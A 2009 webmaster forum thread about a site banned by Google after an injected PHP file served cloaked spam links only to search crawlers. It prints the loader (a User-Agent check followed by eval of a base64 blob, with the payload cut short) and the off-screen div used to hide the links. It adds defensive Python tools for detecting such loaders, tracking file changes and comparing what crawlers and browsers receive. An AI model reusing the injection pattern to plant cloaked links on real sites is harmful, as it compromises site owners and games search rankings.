
Google SEO News and Discussion Forum

30 day ban for cloaked outgoing links due to PHP hack
Lord Majestic




msg:3823011
 7:49 pm on Jan 9, 2009 (gmt 0)

This is heads up for people - just had my old site completely removed from Google index, message in WMC said that cloaked hidden links were found on homepage.

Checked PHP files and could not find those links (you need to use Googlebot useragent), but after careful investigation it was determined that clever PHP injection was made into one of the files included from index.php with datestamp kept intact.

Here is the PHP:

// Runs only when the User-Agent header looks like a search engine crawler
if (strstr($_SERVER['HTTP_USER_AGENT'], 'Mybot') || strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot') || strstr($_SERVER['HTTP_USER_AGENT'], 'msn') || strstr($_SERVER['HTTP_USER_AGENT'], 'Slurp')) {
    eval(base64_decode('ZnVuY3Rpb24...QoKTsK'));
}

If decoded it shows up that the spam links are taken from external URL that I won't post here (you can decode).

Now what's really odd is that Google just banned the whole site because of these clearly hacked links - it seems a rather harsh reaction given that they are well aware that such hacks are commonplace now; it seems the more reasonable move would have been to warn the user and devalue outgoing links.

[edited by: tedster at 7:56 pm (utc) on Jan. 9, 2009]
[edit reason] obscure the spammer link code [/edit]
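Added example (not part of the original thread): since the spam links themselves never appear in the PHP files, a search has to target the loader shown above, an eval(base64_decode('...')) call, rather than the anchor text. The sketch below scans source text for that shape and decodes the blob to list any URLs inside it; the function names, file suffixes and sample payload are assumptions made for illustration.

```python
import base64
import re
from pathlib import Path

# Loader shape from the post: eval(base64_decode('<literal>')). A call that
# decodes a variable instead of a quoted literal is not matched here.
LOADER_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([^'\"]+)\1", re.I)
UA_RE = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")
URL_RE = re.compile(rb"https?://[^\s'\"<>)]+")


def scan_source(text):
    """Return one finding per eval(base64_decode('...')) call in PHP source."""
    findings = []
    for m in LOADER_RE.finditer(text):
        blob = re.sub(r"[^A-Za-z0-9+/]", "", m.group(2))
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except ValueError:
            decoded = b""      # truncated or damaged blob: still report the call
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "ua_gated": bool(UA_RE.search(text)),   # file also tests User-Agent
            "urls": [u.decode("ascii", "replace")
                     for u in URL_RE.findall(decoded)],
        })
    return findings


def scan_tree(root, suffixes=(".php", ".inc", ".phtml")):
    """Scan every PHP-like file under root; returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_source(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample with the same structure as the injected snippet; the
# encoded payload is only a comment carrying a placeholder URL.
_PAYLOAD = b"// constructed payload: http://links.example.invalid/list.txt"
SAMPLE = (
    "<?php\n"
    "include 'header.php';\n"
    "if (strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {\n"
    "    eval(base64_decode('" + base64.b64encode(_PAYLOAD).decode() + "'));\n"
    "}\n"
)
```

Run scan_tree() over the document root, including every file pulled in by index.php, and treat any hit in a file you did not write yourself as a reason to compare it against a clean copy.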

 

tedster




msg:3823015
 7:59 pm on Jan 9, 2009 (gmt 0)

Because the server is hacked, there's a much higher possibility of malware being served at any time. That's why hacked sites get smacked so hard - Google is protecting their end users.

with datestamp kept intact

An added level of deviousness I hadn't focused on before. Thanks for that report, it's good to know. We've got a thread with a lot more information about server hacks here: [webmasterworld.com...]

[edited by: tedster at 8:05 pm (utc) on Jan. 9, 2009]

Lord Majestic




msg:3823018
 8:03 pm on Jan 9, 2009 (gmt 0)

Just to add up a few more details:

Spam links are taken from external webservers (most likely also hacked) - trying to look for them or anchor text quoted by Google in WMC message won't give results as it's not in your PHP files.

HTML blob that is used by this spam hack is hidden using this style text (hope it's okay to post here)

<div style="left: -2321px; position: absolute; top: -3454px">

Also as the code shows up it is cloaked so you won't see it unless you use Googlebot :(

All hacked outgoing links were belonging to .EDU domains (most likely hacked) - I wonder if Google bans those!

-----

I've had hacks before (datestamps usually gave them away quickly, but not this time) however what surprised me today is not the fact that the hack was pretty clever, but the fact that Google banned established site out of the blue - so, now there is a new way of dealing with competitors: hack server to put up some bad outgoing links like this and one gets banned. :o

Reinclusion request with detailed explanation fired up to Google, will see what it results in.

[edited by: Lord_Majestic at 8:04 pm (utc) on Jan. 9, 2009]

tedster




msg:3823020
 8:08 pm on Jan 9, 2009 (gmt 0)

If you've fixed the security hole that allowed the hack, include that information in your reconsideration request. That's important for a speedy recovery of your site. If you don't fix the security hole itself but only remove the cloaked links, you can have a long wait.

Lord Majestic




msg:3823021
 8:09 pm on Jan 9, 2009 (gmt 0)

Because the server is hacked, there's a much higher possibility of malware being served at any time.

Sorry for posting again, but I think it's not at play here:

a) links were cloaked so regular user won't find them
b) links were hidden from user with fancy style tag
c) links were pointing out to .EDU sites with known spammy words starting with V/C etc.

So, I think here Google did not like the fact of gaming the PageRank algorithm rather than malware issue - they did not detect any malware on my site, this is purely link spam thing that now seems to be able to take site out of index pretty quickly.

Lord Majestic




msg:3823022
 8:10 pm on Jan 9, 2009 (gmt 0)

If you've fixed the security hole that allowed the hack

Well, this is not the info that hackers left - I have no clue how they got in, but I am moving my hosting to new much more secure (not shared) location. I included details of the hack to show that we had nothing to do with it as all such links are hosted elsewhere. I hope this will be enough for unban. :(

Not sure if it's worth telling Google this in another reconsideration request, I presume now I just need to move site to better location and wait for unban, hopefully it appears in 30 days max.

[edited by: Lord_Majestic at 8:14 pm (utc) on Jan. 9, 2009]

Lord Majestic




msg:3825266
 1:10 pm on Jan 13, 2009 (gmt 0)

Just to finish this off - today my site was unbanned, pretty quick turn around considering it took maybe 1-2 business days. I am going to move it to more secure (not shared) hosting that hopefully will avoid this stuff in the future, also auto monitoring of file changes seems to be in order too.

tedster




msg:3825414
 4:28 pm on Jan 13, 2009 (gmt 0)

Thanks for the update - that is the outcome I expected and I'm happy it worked out for you.

Lord Majestic




msg:3825592
 8:04 pm on Jan 13, 2009 (gmt 0)

Thanks for good words, I am sure glad it worked (even though most of traffic comes from direct links rather than SEs).

There is still a bit of a bitter taste after all this: don't want to turn this thread into Google bashing but I think things like this will play part in their undoing.

The people who do this sort of hacking stuff should certainly be punished but so far it seems it is the people who had nothing to do with it get hit :(

[edited by: Lord_Majestic at 8:05 pm (utc) on Jan. 13, 2009]

tedster




msg:3825617
 8:23 pm on Jan 13, 2009 (gmt 0)

I see this issue quite differently. If Google didn't take hacked pages out the SERPs, then the general population would be up in arms because of the problems they get from clicking on Google links. It's their website, and they are only being responsible by not linking to pages that might cause problems for their users.

If I find an external link on a client site that points to a hacked page, I tell the client to get rid of the link - and it usually takes a lot longer than a few days for that link to be replaced.

This is the unfortunate result of the "pirate" mentality that infects the web. We should direct our anger at the hackers on this one, not Google. I also get bothered by the aura of "glamor" that some people give to this kind of hacking. It's destructive behavior, plain old, and it's not something to mythologize.

So yes, sometimes the victim suffers. That's what the word "victim" is all about.

travelin cat




msg:3827595
 4:52 am on Jan 16, 2009 (gmt 0)

Checked PHP files and could not find those links (you need to use Googlebot useragent),

Could you please explain how to do this for us less savvy people?

SEOPTI




msg:3827607
 5:13 am on Jan 16, 2009 (gmt 0)

The Firefox "user agent switcher" addon will do the job, you can surf your site as Googlebot or whatever you want.

koan




msg:3827631
 6:14 am on Jan 16, 2009 (gmt 0)

don't want to turn this thread into Google bashing but I think things like this will play part in their undoing

It seems Google did everything right. Banning your site got your full attention. How is Google supposed to know if you are being hacked or if it's deliberate? It's not for them to decide, your web site is your responsibility. Then when you fixed it up and asked for reconsideration, they unbanned you in just a few days. Seems to me Google was very effective and beyond reproach. With the millions of sites out there, I understand how they look for their interest and their users interest first. Google is no nanny.

JS_Harris




msg:3827707
 9:39 am on Jan 16, 2009 (gmt 0)

A site showed signs of something not being right, it got removed from Google quickly. To me that says everything is working as it should, there is no reason to potty mouth Google. I second Koan's statement above.

Now the real question is, how do we catch the hacker responsible? Plugging holes doesn't seem like it's enough of a deterrent, I'd love to see a trap placed over it instead. Let the hacker get swamped with spam for a change.

Chico_Loco




msg:3827871
 3:08 pm on Jan 16, 2009 (gmt 0)

Just an FYI... you might want to set up a checksum reference type check. That way, the checksum for the files will differ regardless of last modified date. Get a differing checksum and you know the file has changed!

Doesn't work as easy if files are being auto-modified however.
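Added example (not part of the original thread): one way to set up the checksum check suggested above, so that a changed include is reported even when its last-modified date has been put back. The function names, the directory layout and the "cache/*" ignore pattern (for files the site rewrites by itself) are assumptions for illustration.

```python
import fnmatch
import hashlib
import os
import tempfile


def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def snapshot(root, ignore=()):
    """Map each file path (relative to root) to its SHA-256 digest.

    `ignore` lists glob patterns for paths the application rewrites on its
    own (caches, uploads): the auto-modified case the post mentions.
    """
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if not any(fnmatch.fnmatch(rel, pat) for pat in ignore):
                digests[rel] = sha256_file(full)
    return digests


def diff_snapshots(old, new):
    """Sorted lists of modified, added and removed relative paths."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def _write(path, body, mode="w"):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as fh:
        fh.write(body)


def demo():
    """Constructed scenario: an include changes but keeps its old datestamp."""
    with tempfile.TemporaryDirectory() as root:
        inc = os.path.join(root, "inc", "header.php")
        cache = os.path.join(root, "cache", "page.html")
        _write(os.path.join(root, "index.php"), "<?php include 'inc/header.php';\n")
        _write(inc, "<?php echo '<h1>Home</h1>';\n")
        _write(cache, "v1\n")
        os.utime(inc, (1200000000, 1200000000))         # give it an old mtime
        baseline = snapshot(root, ignore=["cache/*"])
        _write(inc, "/* constructed change */\n", "a")  # content changes...
        os.utime(inc, (1200000000, 1200000000))         # ...datestamp put back
        _write(cache, "v2\n")                           # routine rewrite, ignored
        _write(os.path.join(root, "new.php"), "<?php\n")
        changes = diff_snapshots(baseline, snapshot(root, ignore=["cache/*"]))
        return changes, int(os.stat(inc).st_mtime)
```

Keep the baseline somewhere the web server account cannot write, otherwise whoever alters the files can also regenerate the digests.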

kapow




msg:3828047
 7:38 pm on Jan 16, 2009 (gmt 0)

This sort of thing is reaching plague proportions in the last 2-3 years. I am trying to put together a list of checks, e.g.
- Form Hacks: Escape and filter in the form script.
- Server Hacks: Host reputation.
- Common 3rd party App hacks: e.g. Older versions of WordPress...

But I'm not a programmer, so I'm a bit in the dark. The webmaster community really needs a guide on hack prevention.

Erku




msg:3828474
 4:31 pm on Jan 17, 2009 (gmt 0)

If I want to check if my website is having or not a similar problem.

How can I check for this problem? Do I ask the host to check? Or is there a way I can check?

Thank you.

Lord Majestic




msg:3828478
 4:47 pm on Jan 17, 2009 (gmt 0)

If Google didn't take hacked pages out the SERPs, then the general population would be up in arms because of the problems they get from clicking on Google links

There are 2 types of hacked links:
1) malware - designed for user to see them and infect their machine
2) rank boosting - invisible to users but visible to Google crawlers

My case is #2 - users were in no danger because they would never see those links - the intention of the hacker was to only influence Google ranking and Google knew that, yet they banned whole site from index - not just the hacked page. I think this is well overboard and only monopoly can afford to do such things - it's just a matter of time before they get sued and lose it.

I didn't suffer from hackers actually - they did good job to hide their actions, my users did not suffer either - they never saw such links as they were cloaked , only Google in this case "suffered", they detected such links and should have devalued them, not ban whole site out of the blue.

Lord Majestic




msg:3828480
 4:51 pm on Jan 17, 2009 (gmt 0)

Could you please explain how to do this for us less savvy people?

The hackers changed PHP file that was included from main index.php (so harder to find it was changed), kept old datestamp and also they did not put links directly into code - instead they had PHP code (encoded) to pull those links from a few external sites that were hosting them.

This meant that when I first searched for such alleged (by Google) links in my PHP files I could not find anything.

As the result I am now moving to more secure location (not shared hosting).

Google's behavior however is not acceptable in my view - banning whole site simply because some hidden links appeared is way too harsh, they know lots of sites get hacked yet they choose to ban them so quickly.

It seems to me this allows to create an easy black hat strategy - hack competitor site to place such hidden links and they get removed from index completely, that's crazy stuff IMO.

tedster




msg:3828583
 8:52 pm on Jan 17, 2009 (gmt 0)

they detected such links and should have devalued them, not ban whole site out of the blue.

I still see it differently. If your site is open to that hacker, they can switch to something more malicious at any time, or even for any user agent. Sorry to disagree, but as an end user I want Google to keep hacked websites out of their search results, whether the hack is "harmless" at the moment or not.

And take it one step further - cloaked links, whether hacked or not, are a violation of Google's guidelines.

I appreciate that a hack and ranking problem feels like a terrible violation - as indeed it is. But Google is not the villain here, the hacker is.

Lord Majestic




msg:3828627
 9:47 pm on Jan 17, 2009 (gmt 0)

If your site is open to that hacker, they can switch to something more malicious at any time

I don't want to turn this thread into Google bashing but I disagree completely.

tedster




msg:3828652
 11:05 pm on Jan 17, 2009 (gmt 0)

Then let's agree to disagree about the hacking.

How about the fact that your website was cloaking? Google has always reserved the right to remove a website for cloaking. I'd say you were fortunate to get a rapid recovery so quickly after the cloaking stopped.

reaxion




msg:3828672
 12:10 am on Jan 18, 2009 (gmt 0)

If this happened and you were to check the cache of the page in google would such devious links that have been injected on the site show up in the cache? From my understanding they would show up as the cached page is equal to that of what google analyzes and interprets. Please let me know if I'm off here?

Erku




msg:3828680
 1:18 am on Jan 18, 2009 (gmt 0)

Can anyone please explain how to check your site for this type of hacking?

Any online tools? Any specific way?

tedster




msg:3828683
 1:28 am on Jan 18, 2009 (gmt 0)

Yes, Google's cache would show the cloaked links - if the hacker hasn't also included a no-cache meta tag in their hack.

The best discovery tool for the website owner is to browse their own website using a googlebot user-agent, which is easily done with a Firefox add-on called "User Agent Switcher". But even better than discovering a hack after it already happened is preventing it. Keep your web server secure by installing the most recent updates for your software as soon as they become available. Pay particular attention to widely used applications such as blogging software, content management systems and off-the-shelf forum software.

Also note that this thread discusses only one of the MANY possible hacks that are on the rise and can hurt you in Google. For a more complete discussion, see this thread: How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]. It's listed in the Hot Topics area [webmasterworld.com], which is always pinned to the top of this forum's index page.

pontifex




msg:3828819
 10:08 am on Jan 18, 2009 (gmt 0)

Can anyone please explain how to check your site for this type of hacking?

I strongly recommend lynx, the command line browser. There is a Windows/DOS port of it available and the tool shows you the text and links in a nice list.

On Linux (or Unix) you can automate the call of certain URLs and mail yourself the output. For the Linux guys out there:

lynx -dump http://www.yourowndomain.tld/ | grep http: | grep -v yourowndomain

filters the outgoing links from your homepage on yourowndomain and puts them in a nice list.

With a daily cron job and some mails to yourself you may just feel a bit better with your links controlled that way!

P!

[edited by: tedster at 8:38 pm (utc) on Jan. 18, 2009]
[edit reason] de-link the example url [/edit]
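Added example (not part of the original thread): the two checks suggested above, browsing as Googlebot and listing outgoing links, combined into one comparison that reports links served to a crawler User-Agent but not to a browser. The function names, the browser User-Agent string and the sample pages are constructed for illustration; the sample reuses the off-screen div style quoted earlier in the thread.

```python
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


class _LinkCollector(HTMLParser):
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.links = base_url, set()

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href:
            self.links.add(urljoin(self.base_url, href))


def outgoing_links(html, base_url):
    """Absolute http(s) links in `html` that point off the site's own host."""
    own = urlparse(base_url).hostname
    parser = _LinkCollector(base_url)
    parser.feed(html)
    return {u for u in parser.links
            if urlparse(u).scheme in ("http", "https")
            and urlparse(u).hostname != own}


def crawler_only_links(browser_html, crawler_html, base_url):
    """Outgoing links served to the crawler User-Agent but not to a browser."""
    return sorted(outgoing_links(crawler_html, base_url)
                  - outgoing_links(browser_html, base_url))


def fetch(url, user_agent, timeout=15):
    """Fetch `url` presenting `user_agent`; meant for checking your own site."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


def check_site(url):
    """Live check: an empty list means both User-Agents got the same links."""
    return crawler_only_links(fetch(url, BROWSER_UA), fetch(url, CRAWLER_UA), url)


# Constructed responses for one page, as a browser and as a crawler receive it.
BASE = "http://www.yourowndomain.tld/"
AS_BROWSER = '<a href="/about">About</a> <a href="http://partner.example/">Partner</a>'
AS_CRAWLER = AS_BROWSER + (
    '<div style="left: -2321px; position: absolute; top: -3454px">'
    '<a href="http://dept.university.example/~u/p.html">x</a></div>')
```

A hack that keys on the crawler's IP address rather than the User-Agent header will not show up this way; Google's cached copy of the page, mentioned earlier in the thread, is the check for that case.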

Lord Majestic




msg:3828846
 11:33 am on Jan 18, 2009 (gmt 0)

How about the fact that your website was cloaking?

My site was hacked - the code injected by the attacker showed a few links in a hidden style layer.

It is too harsh in my view to ban site that was in existence for a very long time only because suddenly a few links appeared on homepage - they were cloaked (that's why I did not see them), sure, but banning on sight when Google perfectly knows that lots of such hacks are going around is totally wrong.

What Google should have done is:
a) devalue such links
b) send message to site owner warning about possible ban

Let me repeat this - Google knows perfectly well that lots of sites now get hacked en masse, we will never have perfect security - they are placing unreasonable burden upon shoulders of people who might not even know they were banned - just how many sites disappeared from Google index only because they were small and their owners away on vacation?

Hackers are evil people, but Google is now making things REALLY bad - if my car is stolen by thieves then it's bad enough, however if I lose my driving license because of that then it's totally wrong and does not happen in real world - Google will get slapped for their actions that are in my view abuse of their monopoly.

Robert Charlton




msg:3829011
 7:30 pm on Jan 18, 2009 (gmt 0)

Google knows perfectly well that lots of sites now get hacked en masse...

Yes, that's precisely the point. I'd look upon Google's reaction as a prudent measure to help prevent further spread of the problem.

Think of it as an automated quarantine or isolation measure to control the spread of a highly contagious and dangerous disease, likely to spread if not contained.

In a public health situation, those unfortunate enough to have come down with, or even to have been exposed to, a disease considered to be sufficiently threatening may not be at fault. Nevertheless, their rights to travel or mingle among the public may be restricted.

[edited by: Robert_Charlton at 7:30 pm (utc) on Jan. 18, 2009]

trillianjedi




msg:3829047
 8:30 pm on Jan 18, 2009 (gmt 0)

Pontifex - that's a great lynx tip, thanks. Just installed lynx on an old box and tried it.

Slick!

Lord Majestic




msg:3829050
 8:48 pm on Jan 18, 2009 (gmt 0)

Yes, that's precisely the point. I'd look upon Google's reaction as a prudent measure to help prevent further spread of the problem.

What problem exactly are they solving? We are not talking here malicious links to viruses or some exploit that can infect users - they are not preventing anything by banning sites like mine who were hacked (this happens all the time and will happen) with cloaked hidden links that were designed to boost ranking of some sites (pointing to .EDU sites in my case - I wonder if Google banned those?!).

It has nothing to do with public health - don't confuse situation that I described with that of compromised web pages that serve viruses, that was not the case and Google knew it because they only saw such links when Googlebot visited the page as they were cloaked.

This attitude will end them in court sooner rather than later and they will lose.
